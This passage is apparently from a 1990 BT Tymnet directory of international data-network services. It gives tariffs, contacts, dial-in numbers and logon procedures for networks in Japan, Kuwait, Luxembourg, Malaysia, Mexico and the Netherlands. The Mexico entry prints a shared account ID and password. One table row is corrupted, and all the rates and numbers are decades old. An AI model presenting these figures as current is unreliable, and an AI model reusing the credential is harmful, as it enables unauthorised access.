:(81.3)-262-8757 Telex :(781)29720 Ontyme:NIS.HQ U.S. Contact: Mr. Nobuhiro Takayama Tel: (212)351-5059 Regional Manager of USA Fax: (212)351-5860 c/o BT Tymnet, Inc. 335 Madison Avenue, 11th Floor New York, New York 10017 1. ACCESS/SPEED: Asynchronous dial-in speeds: 300, 1200, 2400bps Asynchronous leased speeds : 300-2400bps, 9600bps Synchronous leased speeds : 2400-14400bps 2. PROTOCOLS: Async, X.PC, Sync, X.25, RJE, 3270 Bisync, SDLC, CMT & SNA. (IBM, HITACHI, FUJITSU dialects supported) 3. PRICES: Please reference COMMENTS. Service Lead Times: NUI 3 days; Leased lines 30-45 days 4. COMMENTS: I. Service description Service name: Pegasus 1) T2 (TYMNET) Gateway Services (NIS) (TYMNET) ASYNC ASYNC ASYNC X.25 X.25 ASYNC X.25 X.25 3270 BSC Native 3270 BSC Native (IBM, HITACHI, FUJITSU) (IBM HOST) 3270 XNA/CMT ASYNC 3270 BSC/CMT ASYNC (IBM, HITACHI, FUJITSU) ASYNC 3270 BSC/CMT(IBM) ASYNC 3270 SNA/CMT(IBM) SDLC SDLC 3780 3780 ** X.PC is available in ASYNC protocol. ** Public TymDial 9.6 is available at Tokyo. ** X.25, SDLC, XNA interface is available at Tokyo, Osaka, Nagoya, Sappolo, Sendai, Fukui, Okayama, Fukuoka,Toyama and Shizuoka. 2) X.75 Gateway Services (NIS) (TYMNET) ASYNC ASYNC ASYNC X.25 X.25 ASYNC X.25 X.25 3270 BSC/CMT ASYNC 3270 SNA/CMT ASYNC ASYNC 3270 BSC/CMT ASYNC 3270 SNA/CMT 3) International Dedicated Connection The IDC service is designed to provide any dedicated interface customer with a ceiling on connect time charges across their link. The customer will be charged a flat $1,000 or 140,000 yen connect time charge for each interface which receives billing (either U.S. or Japan), plus normal character charges (see below). This means that a customer with one interface on each network making, host to host calls, will pay one IDC charge. Two interfaces receiving IDC traffic will be assess one IDC fixed charge for each interface. This is an ideal service where PVC's are required, for back-up service to an international leased line, or any dedicated application that uses more than 85 to 90 hours per month. A separate order must be entered in OES to obtain this facility (see file, NIS.DOC). 4) TYMUSA Service: Yes II. Pricing. NIS INTERNATIONAL RATE SCHEDULE ------------------------------- Rates are classified into Dedicated port services and Public(Dial-up) services. (Note 1$ U.S. = 150.53 Yen as of 7/90). 1. Dedicated line services Monthly rate 1) General accounting charge 25,000 yen This charge applies to all leased line customers. (Note) Current users that already use NIS domestic service will be charged 5,000 yen only, in addition to domestic General accounting rate. 2) Dedicated port charge 8,000 yen This charge applies to all dedicated interfaces. 3) Each NUI 500 yen 4) Enhanced service charge 15,000 yen This charge applies to customers using BSC or SDLC. 5) International Dedicated Connection (P.V.C.) 140,000 yen or $1,000 per month. This eliminates all connect charges. IDC is charged on a per interface basis, $1,000 for all connect charges across a link (see description above). 6) Leased line charge including a pair of modems. (yen per month) I--------------------------------------------------------I I -10 km -20km -30km -60km -120km I I--------------------------------------------------------I I 2400bps line 28,000 43,000 74,000 102,000 156,000 I I 4800bps line 32,000 47,000 78,000 106,000 160,000 I I 9600bps line 44,000 59,000 90,000 118,000 172,000 I I19200bps line 97,000 112,000 143,000 171,000 225,000 I I--------------------------------------------------------I Installation fee(one time) 212,000 each line 30,000 each modem 7) Dedicated Outdial and TymDial 9.6 facility. Installation 10,000 yen Dedicated port charge 8,000 yen Business Line Charges at cost 8) CPE (Customer Premise Equipment) Purchase Price ATC-4 478,000 yen ATC-8 584,000 yen Pico-Engine 1,498,000 yen Micro-Engine 2 512kb 2,652,000 yen Micro-Engine 3 1024kb 3,536,000 yen Micro-Engine 4 1024kb 3,536,000 yen 9) CPE Rental Price ATC-4 25,000 yen/month 100,000 yen/install ATC-8 30,000 yen/month 100,000 yen/install Pico* 60,000 yen/month 250,000 yen/install Micro-2* 90,000 yen/month 250,000 yen/install Micro-3* 115,000 yen/month 250,000 yen/install Micro-4* 115,000 yen/month 250,000 yen/install * Pico and Micro Price include node code and one interface code. Price for additional interface code is 25,000 yen/interface/month and 250,000 yen/interface/ install. 2. Public (Dial-up) Service.* 1) General accounting charge None 2) Each NUI 500 yen *Available speeds are 300-2400bps, and 9600bps. There is no communication surcharge for 9600bps public dialup. 3. Communication charge 1) Caller paid 1.1 Connect charge 1,920 yen/hour IDC Customers do not pay connect charges. 1.2 Character transmission charge 45 yen/K-char Note step level discounts below. 2) Reverse Charge 2.1. Connect charge $11.40/hour 2.2. Character transmission charge $ .30/K-char 3) Step Level (Volume) discounts for transmission first 10,000 K-char $ .30 or 45 yen per K-char next 40,000 K-char $ .14 or 21 yen per K-char next 100,000 K-char $ .12 or 18 yen per K-char over 150,000 K-char $ .10 or 15 yen per K-char NIS Domestic Rates Schedule Last update: October 4, 1990 --------------------------------------------------------- These rates apply to domestic customers only. 1. Subscription Charge (one time charge) 1. Dial up (Dedicated) Service 100,000 yen/each line 2. Leased line service 140,000 yen/each line 2. General Charge 1. Common to all type of service Customer Account charge 20,000 yen/month Each user name 500 yen/month 2. Dial-up(dedicated) and leased line service only Dedicated port charge 8,000 yen/month (Modem and line surcharge-- conform to the NIS specifics) 3. Communication Charge 1. Access Charge Dial-up (public) service only. 300,1200bps 300 yen/hour 2400bps 450 yen/hour 2. Character transmission Charge I--------------------------------------------------------------I I Kilo byte per month peak time off peak time I I--------------------------------------------------------------I I First 25,000 Kbyte 6.0 yen/Kbyte 2.0 yen/Kbyte I I I I Next 125,000 Kbyte 4.5 yen/Kbyte 2.0 yen/Kbyte I I I I Over 150,000 Kbyte 3.0 yen/Kbyte 2.0 yen/Kbyte I I--------------------------------------------------------------I peak time --from 8 a.m. to 8 p.m. Installation Each modem 30,000 yen Upgrade, Downgrade, Move-- priced at the rate NIS specifies MODEM AND LEASED LINE SURCHARGE RATES 1. Dial-up (Dedicated) service only each 300bps modem 5,000 yen/month each 1200bps modem 6,500 yen/month each 2400bps modem 7,500 yen/month 2. Leased line service only I------------------------------------------------------------------I I line speed -10km -20km -30km -60km -120km I I -----------------------------------------------------------------I I 2400 bps line 28,000 43,000 74,000 102,000 156,000 I I 4800 bps line 32,000 47,000 78,000 106,000 160,000 I I 9600 bps line 44,000 59,000 90,000 118,000 172,000 I J1f0?s X%997,000 112,000 143,000 171,000 225,000 I I------------------------------------------------------------------I (yen per month) ------------------ OPERATIONAL/TECHNICAL INFORMATION --------------------- 1. FIRST LINE CUSTOMER SERVICE/TROUBLE REPORTING: Contact: Network Control Center Hours of Operation: 24hrs/day, 7days/week. Phone: (81.3)-551-6220 Fax : (81.3)-551-6355 Ontyme: NIS.NETCON NIS.TC 2. NETWORK INFORMATION ADDRESS: n/a 3. TEST ADDRESS: Drop Terminal: 440620000840 Echo Host: 44062000089901 4. ASYNC ACCESS PROCEDURE: LOGON: TYMNET STYLE "please log in: " 5. TYMUSA Available: Yes, see note IBAND: n/a, see note Note: IBAND does not apply as network server is not used 6. DEFAULT PAD SETTINGS: 7. ASYNC DIAL-IN ACCESS TELEPHONE NUMBERS: City V.21/300bps V.22/1200bps V.22 1200/2400bps ----------- ----------- ------------ ----------------- Akita 0188-65-5735 0188-65-5733 Atsugi 0462-21-5331 0462-21-0404 Chiba 0472-27-0671 0472-27-0601 Fukui 0776-34-3308 0776-35-8840 Fukuoka 092-474-7076 092-474-7196 Hamamatsu 0534-56-7355 0534-56-7231 Hiroshima 082-241-6857 082-243-9270 Kagoshima 0992-22-8598 0992-22-8954 Kanazawa 0762-24-2351 0762-24-2341 Kobe 078-242-1097 078-242-1115 Kouriyama 0249-38-5396 Kumamoto 096-355-5233 096-354-3065 Kyoto 075-431-6205 075-431-6203 Matsuyama 0899-32-2975 0899-32-4207 Mito 0292-24-1675 0292-24-4213 Morioka 0196-54-8513 0196-54-7315 Nagasaki 0958-28-6088 0958-28-6077 Nagoya 052-911-1621 052-981-3221 Naha (Okinawa) 0988-61-4002 0988-61-3414 Nogano 0262-34-3900 Ohita 0975-38-2160 Okayama 0862-32-6760 0862-31-4993 Osaka 06-271-9028 06-271-9029 06-271-6876 Sapporo 011-281-4343 011-281-4421 Sendai 022-231-5741 022-231-5355 Shizuoka 0542-84-3393 0542-84-3398 Takamatsu 0878-23-0502 0878-23-0501 Takasaki 0273-23-9739 Tokuyama 0834-32-0991 Tokyo 03-555-9525 03-555-9526 03-555-9696 Toyama 0764-41-7578 0764-41-7769 Tsuchiura 0298-55-6123 0298-55-6121 Urawa 048-833-9341 Utsunomiya 0286-34-8251 Yokohama 045-453-7757 045-453-7637 Yonago 0859-32-3201 Note: For NISNET-Tymnet IVAN Installation & Implementation guide, please reference (INTLINFO:38)IIGUD.NIS For NISNET-Tymnet IVAN Service trouble report, please reference (INTLINFO:38)TBLPRO.NIS For detailed NIS business & operation information, please reference (INTLINFO:38)NIS.DOC ======================== Kokusai Denshin Denwa Co. Ltd(KDD) Net. Name: VENUS-P NUI Marketing & Customer Service DNIC: 4408 2-2-2, Marunochi, Chi-Yoda-Ku Tokyo 100, Japan Contact: Mr Kohichi Ukegawa Tel : (81)3-347-5871 Telex : (781)22500 Ontyme: INTL.KDDMKTG Washington Liaison Office: Kokusai Denshin Denwa Company, Ltd. (KDD) 34K, Intelsat Building 3400 International Drive., NW Washington, D.C. 20008-3098 Tel : (202)944-7900 Telex : 440205 KDD UI Fax : (202)362-4365 Ontyme: INTL.KDD/DC New York Liaison Office: Kokusai Denshin Denwa Company, Ltd. (KDD) 535 Madison Avenue 33rd Floor New York, NY 10022 Contact: Mr Toshiki Ueda Tel : (212)832-3550 1. ACCESS/SPEEDS: Asynchronous dial-in speeds: 110-300, 1200bps Asynchronous leased speeds: 110-300, 1200bps Synchronous Leased speeds: 2400, 4800, 9600bps 2. PROTOCOLS: X.25, Bisync, HDLC, Asynchronous terminal interface 3. PRICES: ALL Prices are in Japanese Yen (1$ US = 130.20 yen 7/88) 1: Communication Charges Connect Time: Yen 40/minute Transmission: Yen 2.4/segment A. Installation charges (one time) (for tie line contract) Leased Line Installation Yen 72,000. for 300 bps Yen 102,000. for 1200-9600 DCE/Additional Service Installation: At cost B. Monthly Basic Charge 1. Tie Line Contract: Yen 21,400. for 300 bps Yen 28,200. for 1200 bps Yen 48,000. for 2400 bps Yen 75,000. for 4800 bps Yen 114,000. for 9600 bps Additional Net. Name: Multiple Logical Channel: Yen 90. per logical chnl. Abbreviated Dialing: Yen 1,080 for synchronous Yen 270. for asynchronous Yen 620. per line 2. Dial-up Contract: Yen 270. per NUI per month (abbreviated dialing) 4. COMMENTS: KDD's Liaison offices in New York & Washington are very helpful for any prospect. ------------------ OPERATIONAL/TECHNICAL INFORMATION ------------------------- 1. FIRST LINE CUSTOMER SERVICE/TROUBLE REPORTING: Contact: KDD IDSC Tokyo (Network Control Center) Hours of Operation: 24hrs/365 days Phone: (81)3-347-5221 Telex: (781)26600 Ontyme: INTL.KDDOPNS 2. NETWORK INFORMATION ADDRESS: n/a 3. TEST ADDRESS: 44082006001 4. ASYNC ACCESS PROCEDURES: LOGON: 1. On modem connect. 2. PAD prompt: .P=FA (FA is profile ID) 3. Login string: N-3106xxxxxx[Dcud] ^ ^ optional CUD ___|____| 5. TYMUSA AVAILABLE: Yes 6. DEFAULT PAD SETTINGS: 1:1, 2:1, 3:126, 4:0, 5:1, 6:1, 7:2, 8:0, 9:0, 10:0, 12:1, 13:0, 14:0, 15:0, 16:8, 17:24, 18:0, 19:1, 20:0, 21:0, 22:0 7. ASYNC DIAL-IN ACCESS TELEPHONE NUMBERS: 300bps(V.21) 1200bps(V.22) 2400bps(V.22bis) ---------------------------------------------------------------------- Tokyo (81.3)-345-0300 343-1200 344-2400 Osaka (81.6)-944-0300 942-1211 944-2400 Note: These are toll free numbers that can not be accessed via IDDD. --- KUWAIT --- KUWAIT - BASIC GLOBAL CONNECTION SERVICE Ministry of Communications, KUPAC Section Kuwait Contact, Engineering: Tel: 965-2408906 1. ACCESS/SPEEDS: 2. PROTOCOLS: 3. PRICES: All prices are in Kuwaiti Dinars (KD) (1$ US = .29 KD 7/90) A. Fixed Charges: Speed Dial-up Access Leased Line Access -------------------------------------------------------- 300-2400 bps 150 KD 200 KD 4800 bps N/A 250 KD 9600 bps N/A 300 KD B. International Connection Charges: 0.050 KD /min all countries 0.005 KD/segment all countries C. Local Connection Charges: 0.010 KD/minute 0.003 KD/segment 4. COMMENTS: Service is also provided via Bahrain. ------------------OPERATIONAL/TECHNICAL INFORMATION--------------- 1. FIRST LINE CUSTOMER SERVICE/TROUBLE REPORTING: Contact: KUPAC Control Hours of Operation: 0400 - 1000 GMT Phone: 965-2408902/3/4 Telex: 496-30828 Fax: 965-2408907 2. SERVICE INFORMATION ADDRESS: n/a 3. TEST ADDRESS: Contact Customer Service for Test Address 4. ASYNC ACCESS PROCEDURES: 5. TYMUSA AVAILABLE: No 6. DEFAULT PAD SETTINGS: 1:1, 2:1, 3:126, 4:20, 5:2, 6:13, 7:2, 8:0, 9:0, 10:0, 12:1, 13:1, 14:0, 15:1, 16:127, 17:24, 18:18, 19:1, 20:0, 21:0, 22:0, 80:4, 81:88) 7. ASYNC DIAL-IN ACCESS TELEPHONE NUMBERS: NATIONWIDE ACCESS: Modem Speed Access Phone Number -------------------------------------------- 300 bps 143 1200 bps 142 2400 bps 141 --- LUXEMBOURG --- LUXEMBOURG - BASIC GLOBAL CONNECTION SERVICE Administration des P. et T. Net. Name: LUXPAC Division des Telecommunications DNIC: 2704 Bureau 211 5, rue de Hollerich L-2999 Luxembourg Contact: Mr. M. Barnig, Mr. P. Ney Tel. (352) 4991-710 (for information about Luxpac) Telex: (848)3410 ptdt lu Mr. Gilbert Hoscheid Tel. (352) 4991-722 (for subscription and tariffs) Fax (352) 493049 Telex: (402) 60520 OnTyme: INTL.LUXMKTG Mr. Paul Ney Tel: (352) 4991 732 (engineering/technical) Fax: (352)491221 Telex: (402) 3410 Network Supervision and Maint. Tel: (352) 4991 742 Fax: (352) 489324 1. ACCESS/SPEEDS: Asynchronous dial-in speeds: 300, 1200, 1200/75, 2400 bps Asynchronous leased speeds: 300, 1200, 1200/75, 2400 bps Synchronous leased speeds: 2400, 4800, 9600, 19200, 48000, 64000 bps 2. PROTOCOLS: X.25, X.28, X.32 3. PRICES: All prices are in Luxembourg Francs (LF) - Usage Charges for Traffic to the USA (for both types of access: direct or via PSTN) Call set-up charge LF 0.25/call Connect Time LF 4.00/minute Transmission LF 0.20/segment - Direct Access a) Installation Charges for X.28 direct connection LF 5 000,00 for X.25 direct connection LF 75 000,00 b) Monthly Charges for leased lines connection (includes one modem at customer's site and one logical channel for X.25 connection) 110-300 bps X.28 LF 1 500.00 1200/75 bps X.28 LF 2 000.00 1200 bps X.28 LF 3 000.00 2400 bps X.28 LF 4 500.00 2400 bps X.25 LF 5 000.00 4800 bps X.25 LF 7 500.00 9600 bps X.25 LF 10 000.00 19200 bps X.25 LF 17 500.00 48000 bps X.25 LF 30 000.00 64000 bps X.25 LF 35 000.00 c) Other Charges Additional logical channel: . Installation LF 500.00 . Monthly charge LF 100.00 . Access to Teletex conversion unit LF 1 000.00 NUI: . One-time charge LF 500.00 . Monthly charge LF 250.00 - Dial-Up Access X.28 and X.32 a) Installation Charges: NUI LF 1 000.00 b) Monthly Charges X.28: NUI LF 100.00 300 bps LF 200.00 1200 bps LF 1 200.00 2400 bps LF 2 000.00 c) Monthly Charges X.32: NUI LF 100.00 2400 bps LF 3 000.00 4. COMMENTS: --------------------- OPERATIONAL/TECHNICAL INFORMATION ------------------- 1. FIRST LINE CUSTOMER SERVICE/TROUBLE REPORTING: Hours of Operation: 24 Hours a day, 7 days a week Phone: 17 Telex: (402) 60745 Fax: (352) 492617 2. SERVICE INFORMATION ADDRESS: n/a 3. TEST ADDRESS: 027044800000, 027044900000 Echo NUA 027044800001, 027044900001 Drop NUA 4. ASYNC ACCESS PROCEDURES: 1. On modem connect, LUXPAC replies xxx yyy zzz (xxx yyy zzz is the port and node number) 2. Type N followed by your LUXPAC NUI, and by the called NUA, separated by '-' : N-0(cr) or + 3. LUXPAC will reply: COM 5. TYMUSA AVAILABLE: No 6. DEFAULT PAD SETTINGS: 1:0, 2:1, 3:126, 4:0, 5:1, 6:1, 7:2, 8:0, 9:0, 10:0, 11:not defined, 12:1, 13:0, 14:0, 15:0, 16:8, 17:24, 18:42 7. ASYNC DIAL-IN ACCESS TELEPHONE NUMBERS: (National wide) Modem/Speed Access Number ---------------------------------------------------------- X.28 100-300 bps/V21 0731 300 bps/V21 0733 1200/75 bps/V23 0734 1200 bps/V22 0735 2400 bps/V22bis 0736 X.32 2400 bps/V22bis 0732 --- MALAYSIA --- MALAYSIA - BASIC GLOBAL CONNECTION SERVICE Syarikat Telecom Malaysia Berhad (STM) STM Headquarters Jalan Raja Chulan 50200 Kula Lumpur Malaysia Contact: Ms. Rafiah Ibrahim PH: 03-2329494 Telex: MA 90196 NCCPJ 1. ACCESS/SPEEDS: Asynchronous 300, 1200 bps Synchronous 2400, 4800, 9600 bps 2. PROTOCOLS: 3. PRICES: All prices are in Malaysian Ringgit's (MR). (1$ US = 2.70 MR 10/90) Usage Charge Connect Time: $0.45 per minute or part thereof Transmission: $0.25 per 10 segments or part thereof (For dial-up subscribers calls to the MAYPAC exchange will be charged in the telephone bill). SPEED LINE RENTAL/MO. PORT RENTAL/MO. 300 MR 35.00 MR 135.00 1200 MR 35.00 MR 210.00 2400 MR 70.00 MR 320.00 4800 MR 70.00 MR 585.00 9600 MR 70.00 MR 720.00 Installation: Deposit. . . . . . . . . . $500.00 Connection Fee: 300 bps . . . . . . . . . $600.00 1200 bps . . . . . . . . . $850.00 2400 bps . . . . . . . . $1,300.00 4800 bps . . . . . . . . $ 850.00 9600 bps . . . . . . . . $ 850.00 Speed of Line Rental Port Rental NUI Modem per month per month per mo. Dial-In Access 300 bps Normal Telephone $65.00 $10.00 1200 bps rental applies $105.00 $10.00 4. COMMENTS: For leased line connections, modems are included in the rental of lines. -----------------------OPERATIONAL/TECHNICAL INFORMATION------------------- 1. FIRST LINE CUSTOMER SERVICE/TROUBLE REPORTING: 2. SERVICE INFORMATION ADDRESS: 50211320025600 3. TEST ADDRESS: 50211320014510 Echo Host 50211320014211 Drop Terminal 4. ASYNC ACCESS PROCEDURES: Upon modem connect . . . Send: Receive: Maypac Terminal = Send: Receive: User ID = Send: User ID (Issued by Maypac) Receive: Password = Send: Password (Issued by Maypac) Receive: Destination = Send: Network user address (NUA) of intended destination Receive: Connection message 5. TYMUSA AVAILABLE: No 6. DEFAULT PAD SETTINGS: (X.3 Profile) 1:64, 2:1, 3:2, 4:20, 5:0, 6:5, 7:2, 8:0, 9:7, 10:0, 11:X read only par., 12:0, 13:4, 14:7, 15:0, 16:8, 17:24, 18:18 NOTE: The value "X" of parameter no. 11 (speed of the X.28 DTE) is set by the PAD when the physical circuit is established when a carriage return is entered at the "terminal =" by the user during the logon procedure. At the "terminal =" prompt the user may also enter the ID of the standard profile (from an ID list) most suitable for the terminal type and application. 7. ASYNC DIAL IN ACCESS TELEPHONE NUMBERS: City/Territory Modem/Speed Access Number --------------------------------------------------------------------- Kuala Lumpur/Federal Ter. V.21/300 (6.03) 2328800 V.22/1200 (6.03) 2328855 Penang/Pulau Pinang V.21/300 (6.04) 375588 V.22/1200 (6.04) 360088 Kota Kinabalu/Sabah V.21/300 (6.088) 218800 V.22/1200 (6.088) 218855 Petaling Jaya/Selangor V.21/300 (6.03) 7926600 V.22/1200 (6.03) 7926655 Ipoh/Perak V.21/300 (6.05) 548533 V.22/1200 (6.05) 548444 Kuantan/Pahang V.21/300 (6.09) 508800 V.22/1200 (6.09) 508855 Johore Bharu/Johor V.21/300 (6.07) 248800 V.22/1200 (6.07) 248855 Kuching/Sarawak V.21/300 (6.082) 418800 V.22/1200 (6.082) 418855 Kota Bharu/Kelantan V.21/300 (6.09) 748800 V.22/1200 (6.09) 748855 Malacca/Melaka V.21/300 (6.06) 238800 V.22/1200 (6.06) 238855 Alor Star/Kedah V.21/300 (6.04) 715544 V.22/1200 (6.04) 716644 Kuala Terengganu/ V.21/300 (6.09) 638800 Terengganu V.22/1200 (6.09) 638855 Miri/Sarawak V.21/300 (6.085) 410011 V.22/1200 (6.085) 410055 Sandakan/Sabah V.21/300 (6.089) 273300 V.22/1200 (6.089) 273355 --- MEXICO --- MEXICO - BASIC GLOBAL CONNECTION SERVICE (-4h GMT) Last Update: October 15, 1990 Secretaria de Comunicaciones y Transportes Net. Name: TELEPAC Eje Lazaro Cardenas No. 567 DNIC: 3340 03020 Mexico, D.F. Mexico Contact: Jesus A. Ramirez Cordero (52.5) 530-2099 Telex: (383) 170932 OnTyme: INTL.SCTMKTG 1. ACCESS/SPEEDS: Public Dial-in : 110-300, 1200 bps Leased line: 2400, 4800, 9600 bps 2. PROTOCOLS: 3. PRICES: All prices are in U.S. dollars. All calls from Mexico should be sent reverse charged and billed in the U.S. Subscription Charge: $ 51.62 subscription $ 96.33 port usage dedicated line $ 24.08 port usage non dedicated line $17.20 rent for ID (NUI,monthly) These charges are one time charges and cover the subscription to Telepac. The NUI is a monthly charge. Domestic Usage: $240.00 monthly rent for dedicated (Intra Mexico) line $ 4.64 per hour $ 0.79 per kilosegment Traffic to the US: $ 6.50 per hour Transmission: $ 5.00/kilosegment (reverse chg.) Telephone Access Charge: None Telepac's customer service number is 905-530-2099. Calls to Tymnet from Mexico will be reverse charged billed. Tymnet can provide a NUI for access from Mexico. Our agent in Mexico is the best source of aid and information for communications from Mexico. For detailed information regarding the Tymnet NUI and Mexican dial-up access locations read ontyme file, "*** INTL.MEXICO", or consult your Tymnet Sales Representative. 4. COMMENTS: Tymnet Agent: Ing. Alejandro Acosta (525) 523-9421/543-0524 Sistemas Ciberneticos, S.A. OnTyme: INTL.MEXICO/SICISA Concepcion Beistegui No. 109 6 Piso Mexico City, Mexico ------------------------OPERATIONAL/TECHNICAL INFORMATION--------------- 1. FIRST LINE CUSTOMER SERVICE/TROUBLE REPORTING: 2. SERVICE INFORMATION ADDRESS: 3. TEST ADDRESS: 4. ASYNC ACCESS PROCEDURES: Dial access number, (see list below). Upon modem connect. . . Receive: CONNECT 1200 TELEPAC 905 401W TERMINAL= Send: Receive: @ Send: "ID/TYMNET" Receive: PASSWORD= Send: PASSWORD"030537" (password will not be echoed on screen) Receive: @ Send: "C031069 Receive: 3106 9 CONNECTED tymnet: please log in: Send: "host username;password)" 5. TYMUSA AVAILABLE: No 6. DEFAULT PAD SETTINGS: 7. PAD PARAMETER LIST 8. ASYNC DIAL-IN ACCESS TELEPHONE NUMBERS: City/Territory Modem/Speed Access Number -------------------------------------------------------------- ACAPULCO 300 bps (748) 2-33-92 * 300 bps 2-12-48 * 3-70-41 %%x 1200 bps 3-61-17 1200 bps 3-70-15 1200 bps 3-70-67 ** AGUASCALIENTES 1200 bps (491) 5-12-13 ** 300 bps 5-12-21 * 300 bps 5-12-76 2400 bps 5-12-52 2400 bps 5-16-94 COATZACOALCOS 300 bps (921) 2-15-20 300 bps 2-15-52 2-15-51 2-15-19 2-15-27 2-14-04 1200 bps 2-15-18 1200 bps 2-15-16 CUERNAVACA 1200 bps (73) 12-86-02 300 bps 12-83-03 1200 bps 12-86-01 1200 bps 12-86-00 CHIHUAHUA 300 bps (14) 16-73-30 300 bps 16-72-20 300 bps 16-74-75 1200 bps 16-75-75 1200 bps 16-75-95 1200 bps 16-77-47 16-79-50 16-79-00 16-78-00 16-77-57 DURANGO 1200 bps (181) 1-28-51 1200 bps 1-28-52 1-28-58 ** 1200 bps 1-28-60 300 bps 1-28-61 300 bps 1-28-76 1200 bps 1-28-85 GUADALAJARA 300 bps (36) 26-55-68 300 bps 26-56-02 300 bps 26-55-80 300 bps 26-55-86 1200 bps 26-56-25 1200 bps 26-56-51 1200 bps 26-56-38 1200 bps 26-56-67 1200 bps 26-58-36 1200 bps 26-57-76 1200 bps 26-50-64 1200 bps 26-07-82 HERMOSILLO 300 bps (621) 2-30-53 2-34-57 2-35-47 ** 2-38-39 1200 bps 2-39-60 2-72-10 2-71-09 2-74-88 ** LEON 300 bps (471) 4-81-89 4-80-79 1200 bps 4-86-13 4-87-60 ** 4-81-82 * 6-57-51 6-58-12 6-58-54 6-58-56 6-58-70 6-58-93 6-58-16 6-59-55 MAZATLAN (678) 2-03-77 * 2-09-31 * 2-04-87 * 2-05-86 * 1200 bps 2-01-29 2-02-77 MERIDA (99) 24-41-55 300 bps 24-42-90 24-43-89 24-45-08 1200 bps 24-41-02 1200 bps 24-48-19 1200 bps 24-48-56 1200 bps 24-44-19 24-47-89 24-49-20 24-46-90 MEXICALI (65) 53-63-01 ** 300 bps 53-63-04 ** 1200 bps 53-63-17 53-63-05 53-63-06 53-63-07 53-63-08 53-63-09 MEXICO CITY 1200 bps (905) 590-8888 696-6198 695-6005 696-6099 MONTERREY 1200 bps (83) 55-47-53 55-48-07 55-42-27 55-44-36 55-61-45 55-60-93 55-62-49 1200 bps 55-61-03 300 bps 55-45-46 300 bps 55-46-44 300 55-46-45 300 bps 55-41-75 OAXACA 1200 bps (951) 6-99-89 300 bps 6-99-75 6-99-77 6-99-91 1200 bps 6-99-00 PUEBLA 1200 bps 22 40-50-11 40-53-34 * 300 bps 40-53-00 1200 bps 40-54-91 300 bps 40-56-28 1200 bps 40-50-75 40-56-38 QUERETARO 1200 bps (463) 4-22-23 4-29-72 300 bps 4-04-31 ** 4-00-06 ** 1200 bps 4-02-77 SALTILLO 1200 bps (841) 4-54-88 1200 bps 4-55-39 300 bps 4-56-45 ** 4-53-62 ** TAMPICO (12) 15-77-90 * 15-76-10 ** 15-77-28 ** 1200 bps 15-71-90 15-79-97 15-71-99 ** 15-71-48 15-77-40 15-75-45 TOLUCA (721) 6-53-00 ** 6-53-30 ** 6-53-52 ** 6-53-18 ** 1200 bps 6-52-07 6-52-29 6-52-41 6-52-63 TORREON 1200 bps (17) 16-50-40 16-52-38 16-59-92 16-50-30 ** 16-50-82 ** 1200 bps 16-51-86 1200 bps 16-50-92 VERACRUZ (29) 31-40-33 31-41-58 1200 bps 31-42-83 31-44-08 31-45-33 31-46-58 31-47-83 31-49-08 31-50-33 31-51-58 31-52-83 31-54-08 31-55-11 ** 31-56-36 ** 31-57-61 ** 31-58-86 ** VILLAHERMOSA 300 bps (931) 3-14-02 ** 3-14-55 ** 3-15-69 ** 1200 bps 3-15-10 3-14-55 3-15-64 3-15-03 * * DA%O MODEM ** DA%O L.P. --- NETHERLANDS --- NETHERLANDS - BT TYMNET GLOBAL NETOWRK CONNECTION SERVICE BT TYMNET Network Name: BT TYMNET K.P. Van Der Mandelelaan 78 3062 MB Rotterdam The Netherlands Contact: Sales and Marketing Telephone: (31.10)452 3866 Fax: (31.10)453 2590 1. ACCESS/SPEEDS: Async dial-in speeds: 300-9600 bps Async leased speeds: 300-9600 bps Sync. leased speeds: 4800-14400 bps Higher speeds available upon request 2. PROTOCOLS: Async (X.28), X.25, IBM 3270 BSC, 3270 SNA/SDLC, SDLC, RJE/HASP, other services available upon request. 3. PRICES: All prices are in U.S. Dollars. Billing in local currency is available. Dial-up Async (X.28) Service: The following hourly rates ($/hour) apply depending on the destination of the call from the GNS public async port in the Netherlands. There are no data volume charges: -------------------------------------------------------------- FROM: | TO: | EUR-I EUR-II USA JAPAN PACIFIC -------------|------------------------------------------------ BT TYMNET | Netherland s | $8.00 $10.00 $18.00 $24.00 $24.00 (EUR-I) | -------------------------------------------------------------- EUR-I: France, Netherlands, United Kingdom, Germany, Belgium Denmark, Switzerland EUR-II: Italy, Sweden PACIFIC: Austrlia NOTE: Minimum session charge is 2.5 minutes CONTACT YOUR SALES REPRESENTATIVE FOR DETAILED INFORMATION AND ADDITIONAL SERVICES. 4. COMMENTS: ---------------------OPERATIONAL/TECHNICAL INFORMATION------------------- 1. FIRST LINE CUSTOMER SERVICE/TROUBLE REPORTING: Contact: Customer Support Hours of Operation: 8:30am - 6:30pm local/M-F Telephone: (31.10)452 3866 Fax: (33.10)453 2590 After hours contact the 24 Customer Support Center in Vienna, Virginia at (703) 442-0145 2. SERVICE INFORMATION BULLETIN BOARD ADDRESS: Username INFORMATION Username HELP 3. TEST ADDRESS: 3106000715 4. ASYNC ACCESS PROCEDURES: Upon modem connect. . . Receive: Please type your terminal identifier (NOTE: String of characters may appear at speeds higher than 300 bps) Send: "a" Receive: Please log in: Send: TYMNET username (NUI) Receive: Password: Send: Your password 5. TYMUSA AVAILABLE: Yes 6. DEFAULT PAD SETTING: N/A 7. ASYNC DIAL-IN ACCESS TELEPHONE NUMBERS: City/Territory Modem/Speed Access Number ------------------------------------------------------------------- Alkmaar 300-9600 MNP (011.31.72) 155190 Amsterdam 300-9600 MNP (011.31.20) 6610094 Eindhoven 300-9600 MNP (011.31.4902)45530 The Hague 1200 (011.31.70) 3814641 300-2400 MNP (011.31.70) 3475032 4800-9600 MNP (011.31.70) 3818448 Rotterdam 300-9600 MNP (011.31.10) 4532002 ------------------------------------------------------------------- NOTE: Local X.25 gateway to PTT Datanet-1 service NUA: international: 2041170495 national: 1170495 NETHERLANDS - ENHANCED GLOBAL CONNECTION SERVICE 1. TYMUSA Gateway Host Number: 5393 2. Dialup Node(s): 3462 3. Rate: $15.00/hour and $0.80/Kchar 4. Dialup Locations and Numbers: Alkmaar (011.31.72) 155190 3-2400 MNP Amsterdam (011.31.20) 6610094 300/1200/1200/75/2400/9600 MNP Eindhoven (011.31.4902)45530 3-12-2400 V.21/22/bis The Hague (011.31.70) 3814641 1200 (011.31.70) 3475032 300-2400 MNP (011.31.70) 3818448 4800/9600 MNP Rotterdam (011.31.10) 4532002 300/1200/1200-75/2400/9600 MNP 5. Trouble Reporting Center: Support (local) Phone: (011.31) 703820044 Hours of Operation: M-F 8am - 5pm local time Contact: Jean Van Waterschoot 